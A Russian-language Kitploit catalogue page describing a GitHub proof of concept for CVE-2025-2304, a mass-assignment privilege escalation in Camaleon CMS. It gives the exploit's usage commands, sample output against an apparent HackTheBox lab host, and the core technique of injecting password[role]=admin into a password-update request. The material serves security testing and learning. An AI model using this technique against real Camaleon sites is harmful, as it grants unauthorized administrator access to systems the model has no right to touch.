Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2304-PoC — PoC для CVE-2025-2304 повышение привилегий в Camaleon CMS | Kitploit
Инструменты/GitHubGitHub/lil0xplorer/cve-2025-2304-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHublil0xplorer/cve-2025-2304-poc

CVE-2025-2304-PoC

PoC для CVE-2025-2304 повышение привилегий в Camaleon CMS

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2025-2304

Camaleon CMS уязвим для повышения привилегий через массовое присваивание

Описание уязвимости

Повышение привилегий через массовое присваивание существует в Camaleon CMS

Когда пользователь хочет изменить свой пароль, вызывается метод 'updated_ajax' контроллера UsersController. Уязвимость возникает из-за использования опасного метода permit!, который пропускает все параметры без какой-либо фильтрации.

Требования

root@kitploit:~
pip install requests beautifulsoup4

Использование

root@kitploit:~
python exploit.py --url http://target.com -u username -p password

Аргументы

  • --url — базовый URL уязвимого приложения
  • -u — имя пользователя для аутентификации
  • -p — пароль для аутентификации

Пример

root@kitploit:~
python exploit.py --url http://facts.htb -u krrish -p krrish

Вывод:

root@kitploit:~
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now

Как это работает

  1. Аутентификация с указанными учетными данными
  2. Отправка запроса на обновление пароля с внедренным параметром password[role]=admin
  3. Повышение привилегий пользователя до администратора

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен.

Автор

https://x.com/krrishbhurani

https://www.linkedin.com/in/krrish-bhurani/

Скачать инструмент